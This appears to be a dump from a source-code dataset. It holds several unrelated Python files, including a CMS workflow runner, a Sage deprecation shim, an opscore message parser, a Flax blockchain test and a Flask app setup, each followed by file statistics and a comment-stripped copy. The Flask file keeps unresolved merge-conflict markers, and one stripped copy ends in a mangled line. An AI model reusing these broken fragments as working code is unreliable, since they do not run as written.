default="--limit 0",
action='store')
parser.add_option('--job-reports',
help='Dump framework job reports',
dest='jobReports',
default=False,
action='store_true')
parser.add_option('--ibeos',
help='Use IB EOS site configuration',
dest='IBEos',
default=False,
action='store_true')
opt,args = parser.parse_args()
if opt.IBEos:
import os
from commands import getstatusoutput as run_cmd
ibeos_cache = os.path.join(os.getenv("LOCALRT"), "ibeos_cache.txt")
if not os.path.exists(ibeos_cache):
err, out = run_cmd("curl -L -s -o %s https://raw.githubusercontent.com/cms-sw/cms-sw.github.io/master/das_queries/ibeos.txt" % ibeos_cache)
if err:
run_cmd("rm -f %s" % ibeos_cache)
print("Error: Unable to download ibeos cache information")
print(out)
sys.exit(err)
for cmssw_env in [ "CMSSW_BASE", "CMSSW_RELEASE_BASE" ]:
cmssw_base = os.getenv(cmssw_env,None)
if not cmssw_base: continue
cmssw_base = os.path.join(cmssw_base,"src/Utilities/General/ibeos")
if os.path.exists(cmssw_base):
os.environ["PATH"]=cmssw_base+":"+os.getenv("PATH")
os.environ["CMS_PATH"]="/cvmfs/cms-ib.cern.ch"
os.environ["CMSSW_USE_IBEOS"]="true"
print(">> WARNING: You are using SITECONF from /cvmfs/cms-ib.cern.ch")
break
if opt.restricted:
print('Deprecated, please use -l limited')
if opt.testList: opt.testList+=',limited'
else: opt.testList='limited'
def stepOrIndex(s):
if s.isdigit():
return int(s)
else:
return s
if opt.apply:
opt.apply=map(stepOrIndex,opt.apply.split(','))
if opt.keep:
opt.keep=map(stepOrIndex,opt.keep.split(','))
if opt.testList:
testList=[]
for entry in opt.testList.split(','):
if not entry: continue
mapped=False
for k in predefinedSet:
if k.lower().startswith(entry.lower()) or k.lower().endswith(entry.lower()):
testList.extend(predefinedSet[k])
mapped=True
break
if not mapped:
try:
testList.append(float(entry))
except:
print(entry,'is not a possible selected entry')
opt.testList = list(set(testList))
if opt.useInput: opt.useInput = opt.useInput.split(',')
if opt.fromScratch: opt.fromScratch = opt.fromScratch.split(',')
if opt.nProcs: opt.nProcs=int(opt.nProcs)
if opt.nThreads: opt.nThreads=int(opt.nThreads)
if (opt.memoryOffset): opt.memoryOffset=int(opt.memoryOffset)
if (opt.memPerCore): opt.memPerCore=int(opt.memPerCore)
if opt.wmcontrol:
performInjectionOptionTest(opt)
if opt.overWrite:
opt.overWrite=eval(opt.overWrite)
if opt.raw and opt.show: ###prodAgent to be discontinued
ret = showRaw(opt)
else:
ret = runSelected(opt)
sys.exit(ret)
| 41.390313
| 216
| 0.489744
|
from __future__ import print_function
import sys
from Configuration.PyReleaseValidation.MatrixReader import MatrixReader
from Configuration.PyReleaseValidation.MatrixRunner import MatrixRunner
from Configuration.PyReleaseValidation.MatrixInjector import MatrixInjector,performInjectionOptionTest
def showRaw(opt):
mrd = MatrixReader(opt)
mrd.showRaw(opt.useInput, opt.refRel, opt.fromScratch, opt.raw, opt.step1Only, selected=opt.testList)
return 0
def runSelected(opt):
mrd = MatrixReader(opt)
mrd.prepare(opt.useInput, opt.refRel, opt.fromScratch)
if opt.testList:
definedWF = []
for dwf in mrd.workFlows: definedWF.append(dwf.numId)
for twf in opt.testList:
if twf not in definedWF: raise ValueError('Not defined workflow ', twf , ' requested')
ret = 0
if opt.show:
mrd.show(opt.testList, opt.extended, opt.cafVeto)
if opt.testList : print('testListected items:', opt.testList)
else:
mRunnerHi = MatrixRunner(mrd.workFlows, opt.nProcs, opt.nThreads)
ret = mRunnerHi.runTests(opt)
if opt.wmcontrol:
if ret!=0:
print('Cannot go on with wmagent injection with failing workflows')
else:
wfInjector = MatrixInjector(opt,mode=opt.wmcontrol,options=opt.wmoptions)
ret= wfInjector.prepare(mrd,
mRunnerHi.runDirs)
if ret==0:
wfInjector.upload()
wfInjector.submit()
return ret
if __name__ == '__main__':
predefinedSet={
'limited' : [5.1,
7.3,
8,
25,
4.22,
4.53,
9.0,
1000,
1001,
101.0,
136.731,
136.7611,
136.8311,
136.788,
136.85,
140.53,
140.56,
158.0,
1306.0,
1325.7,
1330,
135.4,
10042.0,
10024.0,
10224.0,
10824.0,
11634.0,
12434.0,
20034.0,
20434.0,
21234.0,
22034.0,
25202.0,
250202.181,
],
'jetmc': [5.1, 13, 15, 25, 38, 39],
'metmc' : [5.1, 15, 25, 37, 38, 39],
'muonmc' : [5.1, 124.4, 124.5, 20, 21, 22, 23, 25, 30],
}
import optparse
usage = 'usage: runTheMatrix.py --show -s '
parser = optparse.OptionParser(usage)
parser.add_option('-b','--batchName',
help='relval batch: suffix to be appended to Campaign name',
dest='batchName',
default=''
)
parser.add_option('-m','--memoryOffset',
help='memory of the wf for single core',
dest='memoryOffset',
default=3000
)
parser.add_option('--addMemPerCore',
help='increase of memory per each n > 1 core: memory(n_core) = memoryOffset + (n_core-1) * memPerCore',
dest='memPerCore',
default=1500
)
parser.add_option('-j','--nproc',
help='number of processes. 0 Will use 4 processes, not execute anything but create the wfs',
dest='nProcs',
default=4
)
parser.add_option('-t','--nThreads',
help='number of threads per process to use in cmsRun.',
dest='nThreads',
default=1
)
parser.add_option('-n','--showMatrix',
help='Only show the worflows. Use --ext to show more',
dest='show',
default=False,
action='store_true'
)
parser.add_option('-e','--extended',
help='Show details of workflows, used with --show',
dest='extended',
default=False,
action='store_true'
)
parser.add_option('-s','--selected',
help='Run a pre-defined selected matrix of wf. Deprecated, please use -l limited',
dest='restricted',
default=False,
action='store_true'
)
parser.add_option('-l','--list',
help='Coma separated list of workflow to be shown or ran. Possible keys are also '+str(predefinedSet.keys())+'. and wild card like muon, or mc',
dest='testList',
default=None
)
parser.add_option('-r','--raw',
help='Temporary dump the .txt needed for prodAgent interface. To be discontinued soon. Argument must be the name of the set (standard, pileup,...)',
dest='raw'
)
parser.add_option('-i','--useInput',
help='Use recyling where available. Either all, or a coma separated list of wf number.',
dest='useInput',
default=None
)
parser.add_option('-w','--what',
help='Specify the set to be used. Argument must be the name of the set (standard, pileup,...)',
dest='what',
default='all'
)
parser.add_option('--step1',
help='Used with --raw. Limit the production to step1',
dest='step1Only',
default=False
)
parser.add_option('--maxSteps',
help='Only run maximum on maxSteps. Used when we are only interested in first n steps.',
dest='maxSteps',
default=9999,
type="int"
)
parser.add_option('--fromScratch',
help='Coma separated list of wf to be run without recycling. all is not supported as default.',
dest='fromScratch',
default=None
)
parser.add_option('--refRelease',
help='Allow to modify the recycling dataset version',
dest='refRel',
default=None
)
parser.add_option('--wmcontrol',
help='Create the workflows for injection to WMAgent. In the WORKING. -wmcontrol init will create the the workflows, -wmcontrol test will dryRun a test, -wmcontrol submit will submit to wmagent',
choices=['init','test','submit','force'],
dest='wmcontrol',
default=None,
)
parser.add_option('--revertDqmio',
help='When submitting workflows to wmcontrol, force DQM outout to use pool and not DQMIO',
choices=['yes','no'],
dest='revertDqmio',
default='no',
)
parser.add_option('--optionswm',
help='Specify a few things for wm injection',
default='',
dest='wmoptions')
parser.add_option('--keep',
help='allow to specify for which coma separated steps the output is needed',
default=None)
parser.add_option('--label',
help='allow to give a special label to the output dataset name',
default='')
parser.add_option('--command',
help='provide a way to add additional command to all of the cmsDriver commands in the matrix',
dest='command',
default=None
)
parser.add_option('--apply',
help='allow to use the --command only for 1 coma separeated',
dest='apply',
default=None)
parser.add_option('--workflow',
help='define a workflow to be created or altered from the matrix',
action='append',
dest='workflow',
default=None
)
parser.add_option('--dryRun',
help='do not run the wf at all',
action='store_true',
dest='dryRun',
default=False
)
parser.add_option('--testbed',
help='workflow injection to cmswebtest (you need dedicated rqmgr account)',
dest='testbed',
default=False,
action='store_true'
)
parser.add_option('--noCafVeto',
help='Run from any source, ignoring the CAF label',
dest='cafVeto',
default=True,
action='store_false'
)
parser.add_option('--overWrite',
help='Change the content of a step for another. List of pairs.',
dest='overWrite',
default=None
)
parser.add_option('--noRun',
help='Remove all run list selection from wfs',
dest='noRun',
default=False,
action='store_true')
parser.add_option('--das-options',
help='Options to be passed to dasgoclient.',
dest='dasOptions',
default="--limit 0",
action='store')
parser.add_option('--job-reports',
help='Dump framework job reports',
dest='jobReports',
default=False,
action='store_true')
parser.add_option('--ibeos',
help='Use IB EOS site configuration',
dest='IBEos',
default=False,
action='store_true')
opt,args = parser.parse_args()
if opt.IBEos:
import os
from commands import getstatusoutput as run_cmd
ibeos_cache = os.path.join(os.getenv("LOCALRT"), "ibeos_cache.txt")
if not os.path.exists(ibeos_cache):
err, out = run_cmd("curl -L -s -o %s https://raw.githubusercontent.com/cms-sw/cms-sw.github.io/master/das_queries/ibeos.txt" % ibeos_cache)
if err:
run_cmd("rm -f %s" % ibeos_cache)
print("Error: Unable to download ibeos cache information")
print(out)
sys.exit(err)
for cmssw_env in [ "CMSSW_BASE", "CMSSW_RELEASE_BASE" ]:
cmssw_base = os.getenv(cmssw_env,None)
if not cmssw_base: continue
cmssw_base = os.path.join(cmssw_base,"src/Utilities/General/ibeos")
if os.path.exists(cmssw_base):
os.environ["PATH"]=cmssw_base+":"+os.getenv("PATH")
os.environ["CMS_PATH"]="/cvmfs/cms-ib.cern.ch"
os.environ["CMSSW_USE_IBEOS"]="true"
print(">> WARNING: You are using SITECONF from /cvmfs/cms-ib.cern.ch")
break
if opt.restricted:
print('Deprecated, please use -l limited')
if opt.testList: opt.testList+=',limited'
else: opt.testList='limited'
def stepOrIndex(s):
if s.isdigit():
return int(s)
else:
return s
if opt.apply:
opt.apply=map(stepOrIndex,opt.apply.split(','))
if opt.keep:
opt.keep=map(stepOrIndex,opt.keep.split(','))
if opt.testList:
testList=[]
for entry in opt.testList.split(','):
if not entry: continue
mapped=False
for k in predefinedSet:
if k.lower().startswith(entry.lower()) or k.lower().endswith(entry.lower()):
testList.extend(predefinedSet[k])
mapped=True
break
if not mapped:
try:
testList.append(float(entry))
except:
print(entry,'is not a possible selected entry')
opt.testList = list(set(testList))
if opt.useInput: opt.useInput = opt.useInput.split(',')
if opt.fromScratch: opt.fromScratch = opt.fromScratch.split(',')
if opt.nProcs: opt.nProcs=int(opt.nProcs)
if opt.nThreads: opt.nThreads=int(opt.nThreads)
if (opt.memoryOffset): opt.memoryOffset=int(opt.memoryOffset)
if (opt.memPerCore): opt.memPerCore=int(opt.memPerCore)
if opt.wmcontrol:
performInjectionOptionTest(opt)
if opt.overWrite:
opt.overWrite=eval(opt.overWrite)
if opt.raw and opt.show: cted(opt)
sys.exit(ret)
| true
| true
|
790c50c393f7e3d5309afc7e342afd439d7cb2e5
| 1,043
|
py
|
Python
|
src/sage/algebras/algebra_element.py
|
robertwb/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | 2
|
2018-06-30T01:37:35.000Z
|
2018-06-30T01:37:39.000Z
|
src/sage/algebras/algebra_element.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/algebra_element.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
"""
Base class for algebra elements
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.superseded import deprecation
deprecation(21141, "the module sage.algebras.algebra_element is deprecated, import from sage.structure.element instead")
from sage.structure.element import AlgebraElement
def is_AlgebraElement(x):
r"""
Return true if x is an AlgebraElement
EXAMPLES:
"""
return isinstance(x, AlgebraElement)
| 31.606061
| 120
| 0.612656
|
from sage.misc.superseded import deprecation
deprecation(21141, "the module sage.algebras.algebra_element is deprecated, import from sage.structure.element instead")
from sage.structure.element import AlgebraElement
def is_AlgebraElement(x):
return isinstance(x, AlgebraElement)
| true
| true
|
790c51f87e0d519f54f3f2959899dd92256edd48
| 3,168
|
py
|
Python
|
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T21:08:14.000Z
|
2021-08-17T21:08:14.000Z
|
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
"""Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
"""
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
# print "got keyword %r; nextInd = %r" % (keyword, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
# print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| 39.111111
| 92
| 0.636048
|
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| true
| true
|
790c53f7e56d39b1a643d9e18dc20fad39757347
| 507
|
py
|
Python
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 2
|
2017-12-19T08:18:51.000Z
|
2018-01-19T02:42:28.000Z
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 5
|
2018-01-04T22:54:34.000Z
|
2018-02-06T23:48:20.000Z
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 3
|
2018-01-04T21:18:42.000Z
|
2019-01-20T05:34:33.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pandas as pd
class Index(object):
def __init__(self, idx):
self.idx = idx
@classmethod
def to_pandas(indices):
if isinstance(indices[0], pd.RangeIndex):
merged = indices[0]
for index in indices[1:]:
merged = merged.union(index)
return merged
else:
return indices[0].append(indices[1:])
| 23.045455
| 49
| 0.625247
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pandas as pd
class Index(object):
def __init__(self, idx):
self.idx = idx
@classmethod
def to_pandas(indices):
if isinstance(indices[0], pd.RangeIndex):
merged = indices[0]
for index in indices[1:]:
merged = merged.union(index)
return merged
else:
return indices[0].append(indices[1:])
| true
| true
|
790c54967d8d9b1d0670a59bf6bf62083c10aa50
| 3,073
|
py
|
Python
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 174
|
2021-06-16T17:49:22.000Z
|
2022-03-17T03:03:17.000Z
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 49
|
2021-06-17T14:10:53.000Z
|
2022-01-31T11:04:21.000Z
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 80
|
2021-06-17T14:23:31.000Z
|
2022-02-24T05:52:47.000Z
|
import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from flax.consensus.blockchain import Blockchain
from flax.full_node.hint_store import HintStore
from flax.types.blockchain_format.coin import Coin
from flax.types.condition_opcodes import ConditionOpcode
from flax.types.condition_with_args import ConditionWithArgs
from flax.types.spend_bundle import SpendBundle
from tests.util.db_connection import DBConnection
from tests.wallet_tools import WalletTool
from tests.setup_nodes import bt
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
log = logging.getLogger(__name__)
class TestHintStore:
@pytest.mark.asyncio
async def test_basic_store(self):
async with DBConnection() as db_wrapper:
hint_store = await HintStore.create(db_wrapper)
hint_0 = 32 * b"\0"
hint_1 = 32 * b"\1"
not_existing_hint = 32 * b"\3"
coin_id_0 = 32 * b"\4"
coin_id_1 = 32 * b"\5"
coin_id_2 = 32 * b"\6"
hints = [(coin_id_0, hint_0), (coin_id_1, hint_0), (coin_id_2, hint_1)]
await hint_store.add_hints(hints)
await db_wrapper.commit_transaction()
coins_for_hint_0 = await hint_store.get_coin_ids(hint_0)
assert coin_id_0 in coins_for_hint_0
assert coin_id_1 in coins_for_hint_0
coins_for_hint_1 = await hint_store.get_coin_ids(hint_1)
assert coin_id_2 in coins_for_hint_1
coins_for_non_hint = await hint_store.get_coin_ids(not_existing_hint)
assert coins_for_non_hint == []
@pytest.mark.asyncio
async def test_hints_in_blockchain(self, empty_blockchain): # noqa: F811
blockchain: Blockchain = empty_blockchain
blocks = bt.get_consecutive_blocks(
5,
block_list_input=[],
guarantee_transaction_block=True,
farmer_reward_puzzle_hash=bt.pool_ph,
pool_reward_puzzle_hash=bt.pool_ph,
)
for block in blocks:
await blockchain.receive_block(block)
wt: WalletTool = bt.get_pool_wallet_tool()
puzzle_hash = 32 * b"\0"
amount = int_to_bytes(1)
hint = 32 * b"\5"
coin_spent = list(blocks[-1].get_included_reward_coins())[0]
condition_dict = {
ConditionOpcode.CREATE_COIN: [ConditionWithArgs(ConditionOpcode.CREATE_COIN, [puzzle_hash, amount, hint])]
}
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
blocks = bt.get_consecutive_blocks(
10, block_list_input=blocks, guarantee_transaction_block=True, transaction_data=tx
)
for block in blocks:
await blockchain.receive_block(block)
get_hint = await blockchain.hint_store.get_coin_ids(hint)
assert get_hint[0] == Coin(coin_spent.name(), puzzle_hash, 1).name()
| 33.402174
| 118
| 0.66645
|
import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from flax.consensus.blockchain import Blockchain
from flax.full_node.hint_store import HintStore
from flax.types.blockchain_format.coin import Coin
from flax.types.condition_opcodes import ConditionOpcode
from flax.types.condition_with_args import ConditionWithArgs
from flax.types.spend_bundle import SpendBundle
from tests.util.db_connection import DBConnection
from tests.wallet_tools import WalletTool
from tests.setup_nodes import bt
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
log = logging.getLogger(__name__)
class TestHintStore:
@pytest.mark.asyncio
async def test_basic_store(self):
async with DBConnection() as db_wrapper:
hint_store = await HintStore.create(db_wrapper)
hint_0 = 32 * b"\0"
hint_1 = 32 * b"\1"
not_existing_hint = 32 * b"\3"
coin_id_0 = 32 * b"\4"
coin_id_1 = 32 * b"\5"
coin_id_2 = 32 * b"\6"
hints = [(coin_id_0, hint_0), (coin_id_1, hint_0), (coin_id_2, hint_1)]
await hint_store.add_hints(hints)
await db_wrapper.commit_transaction()
coins_for_hint_0 = await hint_store.get_coin_ids(hint_0)
assert coin_id_0 in coins_for_hint_0
assert coin_id_1 in coins_for_hint_0
coins_for_hint_1 = await hint_store.get_coin_ids(hint_1)
assert coin_id_2 in coins_for_hint_1
coins_for_non_hint = await hint_store.get_coin_ids(not_existing_hint)
assert coins_for_non_hint == []
@pytest.mark.asyncio
async def test_hints_in_blockchain(self, empty_blockchain):
blockchain: Blockchain = empty_blockchain
blocks = bt.get_consecutive_blocks(
5,
block_list_input=[],
guarantee_transaction_block=True,
farmer_reward_puzzle_hash=bt.pool_ph,
pool_reward_puzzle_hash=bt.pool_ph,
)
for block in blocks:
await blockchain.receive_block(block)
wt: WalletTool = bt.get_pool_wallet_tool()
puzzle_hash = 32 * b"\0"
amount = int_to_bytes(1)
hint = 32 * b"\5"
coin_spent = list(blocks[-1].get_included_reward_coins())[0]
condition_dict = {
ConditionOpcode.CREATE_COIN: [ConditionWithArgs(ConditionOpcode.CREATE_COIN, [puzzle_hash, amount, hint])]
}
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
blocks = bt.get_consecutive_blocks(
10, block_list_input=blocks, guarantee_transaction_block=True, transaction_data=tx
)
for block in blocks:
await blockchain.receive_block(block)
get_hint = await blockchain.hint_store.get_coin_ids(hint)
assert get_hint[0] == Coin(coin_spent.name(), puzzle_hash, 1).name()
| true
| true
|
790c565a9dbfdbb2e6752d4dc069ec6a95b66119
| 240
|
py
|
Python
|
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
def sum_recursin(numList):
if len(numList) == 1:
return numList[0]
else:
return numList[0] + sum_recursin(numList[1:])
if __name__ == "__main__":
print(sum_recursin(list(range(1, 101))))
| 21.818182
| 53
| 0.629167
|
def sum_recursin(numList):
if len(numList) == 1:
return numList[0]
else:
return numList[0] + sum_recursin(numList[1:])
if __name__ == "__main__":
print(sum_recursin(list(range(1, 101))))
| true
| true
|
790c57916664bdf52a3d4db6c000e84b671e95b2
| 1,489
|
py
|
Python
|
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
from math import ceil
from time import sleep
from config import *
from servo import *
from camera import *
from pid import *
# Init
servo1 = Servo(2)
servo2 = Servo(3)
servo_count = 0
#servo1.setAngle(90)
#sleep(1)
#servo2.setAngle(90)
#sleep(1)
camera = Camera()
PID = PID()
# Loop
while True:
data = camera.getBallPos()
#data = None
if not (data[0] and data[1]):
print("No ball found")
else:
# Calculate PID
move = PID.calculate(data[0], data[1])
# Print result
#print("x", round(move[0]), "y", round(move[1]), round(move[2]*600))
# Move servos
#move_x = ( (move[0] - conf.cam_x_min) / (conf.cam_x_max - conf.cam_x_min) ) * (conf.servo_max - conf.servo_min) + conf.servo_min
#move_y = ( (move[1] - conf.cam_y_min) / (conf.cam_y_max - conf.cam_y_min) ) * (conf.servo_max - conf.servo_min) + conf.servo_min
move_x = ((move[0])/2)+90
move_y = ((-move[1])/2)+90
print(move_x, move_y)
servo_count += 1
if servo_count > 3:
servo1.setAngle(move_x)
servo2.setAngle(move_y)
servo_count = 0
#servo.moveTo(2, move[1])
# Show frame
cv2.imshow("Frame", data[2])
key = cv2.waitKey(1) & 0xFF
# Stop if 'q' is pressed
if key == ord("q"):
servo1.stop()
servo2.stop()
camera.stop()
| 17.72619
| 137
| 0.534587
|
from math import ceil
from time import sleep
from config import *
from servo import *
from camera import *
from pid import *
servo1 = Servo(2)
servo2 = Servo(3)
servo_count = 0
camera = Camera()
PID = PID()
while True:
data = camera.getBallPos()
if not (data[0] and data[1]):
print("No ball found")
else:
move = PID.calculate(data[0], data[1])
move_x = ((move[0])/2)+90
move_y = ((-move[1])/2)+90
print(move_x, move_y)
servo_count += 1
if servo_count > 3:
servo1.setAngle(move_x)
servo2.setAngle(move_y)
servo_count = 0
cv2.imshow("Frame", data[2])
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
servo1.stop()
servo2.stop()
camera.stop()
| false
| true
|
790c589fa941e030ddafe079129ac8e67b8eeaee
| 1,246
|
py
|
Python
|
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | 1
|
2021-03-10T05:21:37.000Z
|
2021-03-10T05:21:37.000Z
|
"""
module init
"""
from flask import Flask
<<<<<<< HEAD
from config import config_options
from flask_sqlalchemy import SQLAlchemy
import os
=======
from config import DevelopmentConfig
from .views import orders_blue_print
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
def create_app(DevelopmentConfig):
"""
Function create_app:
creates app and gives it the import name
holds the configuration being used.
registers the orders blueprint
:return: app:
"""
app = Flask(__name__)
app.config.from_object(DevelopmentConfig)
app.register_blueprint(orders_blue_print)
<<<<<<< HEAD
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# set the configurations
app.config.from_object(os.environ['APP_SETTINGS'])
db=SQLAlchemy(app)
# initialiaze the database
db.init_app(app)
with app.app_context():
from .import routes
db.create_all
# register your blueprints here
from app.main import main
from app.auth import auth
app.register_blueprint(main)
app.register_blueprint(auth)
@app.route('/')
def hello():
return "Hello World!"
return app
=======
return app
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
| 21.118644
| 56
| 0.693419
|
"""
module init
"""
from flask import Flask
<<<<<<< HEAD
from config import config_options
from flask_sqlalchemy import SQLAlchemy
import os
=======
from config import DevelopmentConfig
from .views import orders_blue_print
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
def create_app(DevelopmentConfig):
"""
Function create_app:
creates app and gives it the import name
holds the configuration being used.
registers the orders blueprint
:return: app:
"""
app = Flask(__name__)
app.config.from_object(DevelopmentConfig)
app.register_blueprint(orders_blue_print)
<<<<<<< HEAD
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config.from_object(os.environ['APP_SETTINGS'])
db=SQLAlchemy(app)
db.init_app(app)
with app.app_context():
from .import routes
db.create_all
from app.main import main
from app.auth import auth
app.register_blueprint(main)
app.register_blueprint(auth)
@app.route('/')
def hello():
return "Hello World!"
return app
=======
return app
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
| false
| true
|
790c594f7ddb0992fcaa78a7176ea150f0f11fb4
| 692
|
py
|
Python
|
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | 1
|
2018-02-05T13:52:18.000Z
|
2018-02-05T13:52:18.000Z
|
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | null | null | null |
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
